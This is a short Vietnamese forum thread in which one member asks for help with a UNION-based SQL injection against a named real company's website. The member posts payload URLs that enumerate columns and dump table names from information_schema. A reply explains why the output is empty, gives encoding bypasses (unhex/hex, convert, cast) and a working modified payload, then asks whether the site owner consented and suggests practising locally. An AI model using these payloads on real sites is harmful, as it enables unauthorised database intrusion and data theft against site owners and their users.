SQL Injection - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

SQL Injection

[Discussion] SQL Injection	12/12/2010 09:39:23 (+0700) \| #1 \| 226912

whitesnow19
Member

Joined: 08/10/2010 03:42:19
Messages: 54
Offline

http://www.etek.com.vn/page.php?type=app&id=null%20union%20select%201,2,3,4,5,6,7,8--

Với link trên thì sẽ cho ra vài con số.
Em đã thử dò version() = 5
Tiếp theo em thử dò table mà không hiển thị gì hết.

http://www.etek.com.vn/page.php?type=app&id=null%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables--

==> trống trơn phần nội dung, không phải trống trơn cả trang web.

Xin các a vào chỉ giáo giúp.

Hack to Learn - Not to Destroy!

[Discussion] SQL Injection	12/12/2010 23:47:42 (+0700) \| #2 \| 226949

voige
Member

Joined: 19/09/2010 09:01:21
Messages: 16
Offline

+Không hiện vì Php.ini --> magic_quotes_gpc = On
Muốn truy vấn đúng thì thêm :
- unhex(hex(table_name))
- convert(table_name using latin2)
- cast( table as char character set latin2)
..........
Tuỳ theo database

ví dụ : http://www......vn/page.php?type=app&id=null%20union%20select%201,unhex%28hex%28group_concat%28table_name%29%29%29,3,4,5,6,7,8%20from%20information_schema.tables--

Bạn lên học thêm về Mysql ,rùi học đến cái này nhé ,rùi tiếp đến cày Ebook :Web Application Vulnerabilities Detect Exploit Prevent, Addison Wesley - Web Hacking Attacks and Defense,hackproofingmysql,SQL Injection Attacks and Defense....

À mà bạn đã hỏi admin Website trên chưa mà inject thế .Lên thực hành trên local

Khiêm tốn ,thật thà ,dũng cảm smilie

Go to:

Users currently in here
1 Anonymous